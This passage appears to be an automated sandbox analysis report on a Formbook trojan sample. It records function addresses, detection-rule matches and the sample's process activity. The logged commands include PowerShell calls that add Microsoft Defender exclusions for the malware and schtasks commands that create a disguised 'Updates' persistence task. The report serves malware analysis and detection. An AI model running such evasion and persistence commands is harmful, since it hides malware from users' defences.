                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0115146014_2_01151460
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116349714_2_01163497
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011A74E014_2_011A74E0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116B73014_2_0116B730
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116995014_2_01169950
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117B95014_2_0117B950
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0116599014_2_01165990
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011CD80014_2_011CD800
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011638E014_2_011638E0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117FB8014_2_0117FB80
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0119DBF914_2_0119DBF9
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011D5BF014_2_011D5BF0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011D3A6C14_2_011D3A6C
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01163D4014_2_01163D40
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_0117FDC014_2_0117FDC0
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_011D9C3214_2_011D9C32
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01179C2014_2_01179C20
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01161F9214_2_01161F92
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: 14_2_01169EB014_2_01169EB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EC02C016_2_02EC02C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE027416_2_02EE0274
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4E3F016_2_02E4E3F0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F003E616_2_02F003E6
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFA35216_2_02EFA352
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02ED200016_2_02ED2000
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF81CC16_2_02EF81CC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF41A216_2_02EF41A2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F001AA16_2_02F001AA
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EC815816_2_02EC8158
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3010016_2_02E30100
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDA11816_2_02EDA118
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5C6E016_2_02E5C6E0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3C7C016_2_02E3C7C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4077016_2_02E40770
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E6475016_2_02E64750
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EEE4F616_2_02EEE4F6
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF244616_2_02EF2446
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE442016_2_02EE4420
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F0059116_2_02F00591
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4053516_2_02E40535
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3EA8016_2_02E3EA80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF6BD716_2_02EF6BD7
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFAB4016_2_02EFAB40
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E6E8F016_2_02E6E8F0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E268B816_2_02E268B8
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4A84016_2_02E4A840
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4284016_2_02E42840
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E429A016_2_02E429A0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F0A9A616_2_02F0A9A6
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5696216_2_02E56962
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFEEDB16_2_02EFEEDB
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E52E9016_2_02E52E90
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFCE9316_2_02EFCE93
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E40E5916_2_02E40E59
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFEE2616_2_02EFEE26
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4CFE016_2_02E4CFE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E32FC816_2_02E32FC8
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EBEFA016_2_02EBEFA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB4F4016_2_02EB4F40
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E82F2816_2_02E82F28
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E60F3016_2_02E60F30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE2F3016_2_02EE2F30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E30CF216_2_02E30CF2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE0CB516_2_02EE0CB5
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E40C0016_2_02E40C00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3ADE016_2_02E3ADE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E58DBF16_2_02E58DBF
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4AD0016_2_02E4AD00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDCD1F16_2_02EDCD1F
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE12ED16_2_02EE12ED
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5B2C016_2_02E5B2C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E452A016_2_02E452A0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E8739A16_2_02E8739A
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E2D34C16_2_02E2D34C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF132D16_2_02EF132D
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF70E916_2_02EF70E9
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF0E016_2_02EFF0E0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EEF0CC16_2_02EEF0CC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E470C016_2_02E470C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4B1B016_2_02E4B1B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E7516C16_2_02E7516C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E2F17216_2_02E2F172
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F0B16B16_2_02F0B16B
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF16CC16_2_02EF16CC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E8563016_2_02E85630
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF7B016_2_02EFF7B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3146016_2_02E31460
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF43F16_2_02EFF43F
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F095C316_2_02F095C3
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDD5B016_2_02EDD5B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF757116_2_02EF7571
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EEDAC616_2_02EEDAC6
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDDAAC16_2_02EDDAAC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E85AA016_2_02E85AA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE1AA316_2_02EE1AA3
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB3A6C16_2_02EB3A6C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFA4916_2_02EFFA49
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF7A4616_2_02EF7A46
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB5BF016_2_02EB5BF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E7DBF916_2_02E7DBF9
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5FB8016_2_02E5FB80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFB7616_2_02EFFB76
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E438E016_2_02E438E0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EAD80016_2_02EAD800
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4995016_2_02E49950
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5B95016_2_02E5B950
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02ED591016_2_02ED5910
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E49EB016_2_02E49EB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E03FD216_2_02E03FD2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E03FD516_2_02E03FD5
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFFB116_2_02EFFFB1
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E41F9216_2_02E41F92
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFF0916_2_02EFFF09
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFCF216_2_02EFFCF2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB9C3216_2_02EB9C32
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5FDC016_2_02E5FDC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF7D7316_2_02EF7D73
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E43D4016_2_02E43D40
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF1D5A16_2_02EF1D5A
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B187016_2_004B1870
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004ACAC016_2_004ACAC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004ACCE016_2_004ACCE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004AAD6016_2_004AAD60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B2FAD16_2_004B2FAD
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B2FB016_2_004B2FB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C732016_2_004C7320
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB906816_2_00BB9068
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9B4416_2_00BB9B44
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9C6416_2_00BB9C64
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9FFE16_2_00BB9FFE
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: String function: 011CEA12 appears 36 times
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: String function: 011A7E54 appears 97 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E75130 appears 58 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E2B970 appears 280 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02EAEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E87E54 appears 111 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02EBF290 appears 105 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0189B970 appears 280 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0191EA12 appears 86 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 018E5130 appears 58 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 018F7E54 appears 111 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0192F290 appears 105 times
                    Source: UnmxRI.exe, 00000000.00000002.2090039067.00000000038E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000000.00000002.2077241511.00000000006BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000000.00000002.2101231859.0000000007190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2230462145.000000000199D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe
                    Source: UnmxRI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QvFRFSSlmclI2FDck0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/16@16/9
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMutant created: \Sessions\1\BaseNamedObjects\lvtQuFzxsXQOCORNnGxcc
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB814.tmpJump to behavior
                    Source: UnmxRI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UnmxRI.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: print.exe, 00000010.00000003.2443596654.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4494834964.0000000000943000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2443596654.0000000000911000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4494834964.0000000000911000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2443548518.0000000000923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: UnmxRI.exeReversingLabs: Detection: 65%
                    Source: UnmxRI.exeVirustotal: Detection: 68%
                    Source: C:\Users\user\Desktop\UnmxRI.exeFile read: C:\Users\user\Desktop\UnmxRI.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
